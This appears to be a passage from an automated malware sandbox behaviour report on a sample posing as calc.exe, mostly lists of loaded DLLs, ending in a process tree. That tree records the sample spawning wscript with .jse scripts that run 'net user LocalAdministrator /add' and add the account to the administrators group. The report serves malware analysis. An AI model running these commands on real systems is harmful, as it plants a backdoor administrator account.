Source: C:\Users\user\Desktop\calc.exe | Section loaded: profapi.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: scrrun.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: msasn1.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: gpapi.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: propsys.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: edputil.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: urlmon.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: srvcli.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: netutils.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: windows.staterepositoryps.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: sspicli.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: wintypes.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: appresolver.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: bcp47langs.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: slc.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: sppc.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: onecorecommonproxystub.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: onecoreuapcommonproxystub.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: samcli.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: netutils.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: dsrole.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: srvcli.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: wkscli.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: logoncli.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: cryptbase.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: samlib.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: samcli.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: netutils.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: dsrole.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: srvcli.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: wkscli.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: logoncli.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: cryptbase.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: samlib.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: version.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: kernel.appcore.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: uxtheme.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sxs.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: jscript.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: iertutil.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: amsi.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: userenv.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: profapi.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wldp.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msasn1.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptsp.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: rsaenh.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptbase.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msisip.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wshext.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrobj.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mpr.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrrun.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: gpapi.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.storage.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: propsys.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: edputil.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: urlmon.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: srvcli.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: netutils.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.staterepositoryps.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sspicli.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wintypes.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: appresolver.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: bcp47langs.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: slc.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sppc.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecorecommonproxystub.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: mpr.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: wkscli.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: netutils.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: samcli.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: srvcli.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: iphlpapi.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: mpr.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: wkscli.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: netutils.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: samcli.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: srvcli.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: iphlpapi.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: samcli.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: netutils.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: dsrole.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: srvcli.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: wkscli.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: logoncli.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: cryptbase.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: samlib.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: mpr.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: version.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: winmm.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: wsock32.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: uxtheme.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: windows.storage.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: wldp.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: kernel.appcore.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: msasn1.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: msasn1.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: sxs.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: jscript.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: iertutil.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: amsi.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: userenv.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: profapi.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: scrrun.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: msasn1.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: gpapi.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: propsys.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: edputil.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: urlmon.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: srvcli.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: netutils.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: windows.staterepositoryps.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: sspicli.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: wintypes.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: appresolver.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: bcp47langs.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: slc.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: sppc.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: onecorecommonproxystub.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: onecoreuapcommonproxystub.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: samcli.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: netutils.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: dsrole.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: srvcli.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: wkscli.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: logoncli.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: cryptbase.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: samlib.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: version.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: kernel.appcore.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: uxtheme.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sxs.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: jscript.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: iertutil.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: amsi.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: userenv.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: profapi.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wldp.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msasn1.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptsp.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: rsaenh.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptbase.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msisip.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wshext.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrobj.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mpr.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrrun.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: gpapi.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.storage.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: propsys.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: edputil.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: urlmon.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: srvcli.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: netutils.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.staterepositoryps.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sspicli.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wintypes.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: appresolver.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: bcp47langs.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: slc.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sppc.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecorecommonproxystub.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: mpr.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: wkscli.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: netutils.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: samcli.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: srvcli.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: iphlpapi.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: mpr.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: wkscli.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: netutils.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: samcli.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: srvcli.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: iphlpapi.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: mpr.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: version.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: winmm.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: wsock32.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: uxtheme.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: windows.storage.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: wldp.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: kernel.appcore.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: msasn1.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: msasn1.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: sxs.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: jscript.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: iertutil.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: amsi.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: userenv.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: profapi.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: scrrun.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: msasn1.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: gpapi.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: propsys.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: edputil.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: urlmon.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: srvcli.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: netutils.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: windows.staterepositoryps.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: sspicli.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: wintypes.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: appresolver.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: bcp47langs.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: slc.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: sppc.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: onecorecommonproxystub.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: onecoreuapcommonproxystub.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: samcli.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: netutils.dll | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" VAJOf7ymJQ.jse | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" mumMT6WOaG.jse | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" fhZL0KwyiV.jse | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" IDsLsRQlEe.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
